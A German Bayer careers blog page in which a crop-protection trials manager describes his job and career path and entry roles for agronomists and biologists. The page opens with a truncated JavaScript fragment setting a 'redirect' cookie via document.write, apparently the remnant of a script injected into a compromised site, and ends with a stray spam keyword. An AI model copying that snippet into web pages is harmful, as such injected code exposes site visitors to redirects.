=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} "/>

Austausch Ihrer personenbezogenen Daten mit Facebook


Wenn Sie auf "Akzeptieren" klicken, wird ein Programm von Facebook geladen und ausgeführt. Dabei können auf Ihre Person bezogene Daten an Facebook übermittelt und dort gespeichert sowie seitens Facebook Cookies auf Ihrem Rechner gesetzt und gelesen werden.
Bayer hat keinen Einfluss auf Art und Umfang der Daten, die so von Facebook erhoben werden können.
Wenn Sie auf "Ablehnen"klicken, wird das Programm nicht geladen und keine personenbezogene Daten an Facebook übertragen.
Details hierzu entnehmen Sie bitte der Datenschutzerklärung von Facebook.

Ablehnen Akzeptieren

Austausch Ihrer personenbezogenen Daten mit Google


Wenn Sie auf "Akzeptieren" klicken, wird ein Programm von Google geladen und ausgeführt. Dabei können auf Ihre Person bezogene Daten an Google übermittelt und dort gespeichert sowie seitens Google Cookies auf Ihrem Rechner gesetzt und gelesen werden.
Bayer hat keinen Einfluss auf Art und Umfang der Daten, die so von Google erhoben werden können.
Wenn Sie auf "Ablehnen"klicken, wird das Programm nicht geladen und keine personenbezogene Daten an Google übertragen.
Details hierzu entnehmen Sie bitte der Datenschutzerklärung von Google.

Ablehnen Akzeptieren

Austausch Ihrer personenbezogenen Daten mit YouTube


Wenn Sie auf "Akzeptieren" klicken, wird ein Programm von YouTube geladen und ausgeführt. Dabei können auf Ihre Person bezogene Daten an YouTube übermittelt und dort gespeichert sowie seitens YouTube Cookies auf Ihrem Rechner gesetzt und gelesen werden.
Bayer hat keinen Einfluss auf Art und Umfang der Daten, die so von YouTube erhoben werden können.
Wenn Sie auf "Ablehnen"klicken, wird das Programm nicht geladen und keine personenbezogene Daten an YouTube übertragen.
Details hierzu entnehmen Sie bitte der Datenschutzerklärung von YouTube.

Ablehnen Akzeptieren

Startseite » Agrarwissenschaften » Innovative Lösungen für die Landwirtschaft finden
Innovative Lösungen für die Landwirtschaft finden

Innovative Lösungen für die Landwirtschaft finden

Hallo zusammen, mein Name ist Robert Brinkmann und ich leite bei der Agrar-Division von Bayer die Abteilung „Agronomic Operations“, d.h. das globale Versuchswesen für die Entwicklung neuer Pflanzenschutzmittel. Ich bin für das weltweite Netzwerk von Versuchsstationen für die Entwicklung von neuen Pflanzenschutzmitteln in allen für Bayer wichtigen Märkten verantwortlich. Dort überwache ich die Versuchsqualität und plane die globalen Versuchskapazitäten in den verschiedenen Ländern. Darüber hinaus bin ich für die Lagerung und den weltweiten Versand der Versuchsmuster verantwortlich.

Nach einer Ausbildung zum Gärtner habe ich in Hannover Gartenbau studiert und im Anschluss in der Phytopathologie promoviert. Ich selbst bin in der Landwirtschaft groß geworden und habe auf unserem eigenen Betrieb immer gute Erfahrungen mit Bayer gemacht. So habe ich mich dann entschlossen, die wissenschaftliche Laufbahn nach drei Jahren Tätigkeit als Hochschulassistent zu verlassen und bin 1991 von der Universität in die Industrie, zu Bayer gewechselt. Dort habe ich damals in der Produktentwicklung als Produktentwicklungsmanager für Fungizide begonnen.

Spannende Entwicklungsmöglichkeiten für Agrarwissenschaftler und Biologen

Nun, bald 30 Jahre später, arbeite ich in einer globalen Funktion, bei der meine Ansprechpartner über den gesamten Globus verteilt sind. So stehe ich in direktem Kontakt mit Kolleginnen und Kollegen aus vielen Ländern, z.B. in Frankreich, Kanada, USA, Argentinien, Brasilien, Südost-Asien, Japan und China.

Ein wesentlicher Bestandteil unserer Aufgabe ist es, Versuchspräparate, die aus der biologischen Forschung, also quasi aus dem Gewächshaus kommen, unter lokalen und regionalen Anbau- und Klimabedingungen zu prüfen und sie dabei gegen die lokal vorkommenden Krankheiten, Schädlinge und Unkräuter zu testen. Nehmen Sie zum Beispiel eine Bananenkrankheit. Diese kommt in Deutschland nun mal nicht vor. Um hier die passenden Pflanzenschutzmittel zu finden, müssen wir unsere neuen Substanzen vor Ort, z.B. in Costa Rica auf Herz und Nieren prüfen. Das Ganze fällt bei Bayer in den Zuständigkeitsbereich der Funktionen „Agronomic Solutions“ und „Agronomic Operations“. Hier in Monheim bin ich für die Koordinierung der globalen Versuchsplanung und damit für die effiziente Nutzung der Versuchskapazitäten in den Ländern sowie für die Belieferung der Länder mit Versuchsmustern verantwortlich. In diesen Bereichen bieten wir Agrarwissenschaftlerinnen und -wissenschaftlern als auch Biologinnen und Biologen eine Vielzahl spannender Einstiegs- und Entwicklungsmöglichkeiten. Als Einstiegsposition haben wir zum einen die Versuchsingenieure (Field Agronomist), die für die Versuche im Feld verantwortlich sind. Mit einer Promotion gibt es auch sehr gute direkte Einstiegsmöglichkeiten als Produktentwicklungsmanager. Wer gerne näher am Kunden arbeitet, kann bei Bayer als Vertriebsberater einsteigen. Hier ist man in Deutschland in einem unserer regionalen Vertriebsgebiete beschäftigt und hat täglichen Kontakt zu unseren Landwirten und Großhändlern.

Digitale Lösungen für die Landwirtschaft

Eine der aktuell spannendsten Aufgaben ist es natürlich, im Zuge der Digitalisierung innovative Lösungen für die Landwirtschaft zu entwickeln. Auf landwirtschaftlichen Flächen mit Winterweizen beispielsweise wollen wir zukünftig dazu beitragen, dass gegen Unkräuter nicht mehr großflächig und prophylaktisch gespritzt werden muss, sondern diese nach dem Auflaufen selektiv und lokal begrenzt behandelt werden, was letztlich den Einsatz von Pflanzenschutzmitteln reduzieren und effizienter machen wird.

Warum Bayer?

Ich kann inzwischen auf eine äußerst abwechslungsreiche Laufbahn zurückblicken; habe über die Jahre hinweg viele verschiedene Aufgaben gehabt, darunter eine Versuchsstation geleitet, mehrere Jahre in Italien gearbeitet, war vier Jahre in Costa Rica und bin allein für Bayer in mehr als 40 Ländern unterwegs gewesen.

Aufgrund dieser Internationalität ist Bayer für mich ein ausgezeichneter Arbeitgeber. Es macht einfach Spaß, sich hier mit den Kolleginnen und Kollegen aus unterschiedlichen Ländern und Kulturen mit den faszinierenden Fragen unserer Gesellschaft zu beschäftigen, Dinge voranzutreiben und innovative Lösungen für eine bessere Landwirtschaft zu entwickeln. Dabei wird es nie langweilig und man lernt nie aus.

Wer eine Leidenschaft für Innovationen in der Landwirtschaft hat und eine akademische Ausbildung der Agrarwissenschaften oder der Biologie (gerne mit Kenntnissen in der Phytopathologie gepaart mit Data Science Kenntnissen) mitbringt, der ist bei Bayer Crop Science bestens aufgehoben. Praktische Kenntnisse und Erfahrungen in der Landwirtschaft oder im Gartenbau verbessern die Einstiegschancen wesentlich.

This post is also available in: Englisch

Allgemeine Nutzungsbedingungen Datenschutzerklärung Impressum Technische Hinweise
Austausch Ihrer personenbezogenen Daten mit Facebook
Wenn Sie auf “Akzeptieren” klicken, wird ein Programm von Facebook geladen und ausgeführt. Dabei können auf Ihre Person bezogene Daten an Facebook übermittelt und dort gespeichert sowie seitens Facebook Cookies auf Ihrem Rechner gesetzt und gelesen werden.

Bayer hat keinen Einfluss auf Art und Umfang der Daten, die so von Facebook erhoben werden können.

Wenn Sie auf “Ablehnen” klicken, wird das Programm nicht geladen und keine personenbezogene Daten an Facebook übertragen.

Details hierzu entnehmen Sie bitte der Datenschutzerklärung von Facebook.

×
Austausch Ihrer personenbezogenen Daten mit Google
Wenn Sie auf “Akzeptieren” klicken, wird ein Programm von Google geladen und ausgeführt. Dabei können auf Ihre Person bezogene Daten an Google übermittelt und dort gespeichert sowie seitens Google Cookies auf Ihrem Rechner gesetzt und gelesen werden.

Bayer hat keinen Einfluss auf Art und Umfang der Daten, die so von Google erhoben werden können.

Wenn Sie auf “Ablehnen” klicken, wird das Programm nicht geladen und keine personenbezogene Daten an Google übertragen.

Details hierzu entnehmen Sie bitte der Datenschutzerklärung von Google.

×
Austausch Ihrer personenbezogenen Daten mit YouTube
Wenn Sie auf “Akzeptieren” klicken, wird ein Programm von YouTube geladen und ausgeführt. Dabei können auf Ihre Person bezogene Daten an YouTube übermittelt und dort gespeichert sowie seitens YouTube Cookies auf Ihrem Rechner gesetzt und gelesen werden.

Bayer hat keinen Einfluss auf Art und Umfang der Daten, die so von YouTube erhoben werden können.

Wenn Sie auf “Ablehnen” klicken, wird das Programm nicht geladen und keine personenbezogene Daten an YouTube übertragen.

Details hierzu entnehmen Sie bitte der Datenschutzerklärung von YouTube.

×
potenzmittel